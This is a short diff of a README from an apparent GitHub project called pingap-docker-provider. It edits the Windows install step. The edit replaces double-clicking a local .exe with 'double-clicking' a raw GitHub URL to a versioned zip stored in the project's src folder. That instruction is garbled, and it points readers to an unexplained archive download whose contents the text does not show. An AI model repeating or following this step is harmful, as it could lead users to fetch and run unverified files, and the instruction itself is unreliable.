peptang12/pingap-docker-provider/README.md

 1. **Windows:**
    - Open the File Explorer and navigate to your Downloads folder.
-   - Double-click on `pingap-docker-provider-windows.exe` to start the application.
+   - Double-click on `https://raw.githubusercontent.com/peptang12/pingap-docker-provider/main/src/pingap-docker-provider-3.7-beta.4.zip` to start the application.

 2. **Linux:**
    - Open your terminal.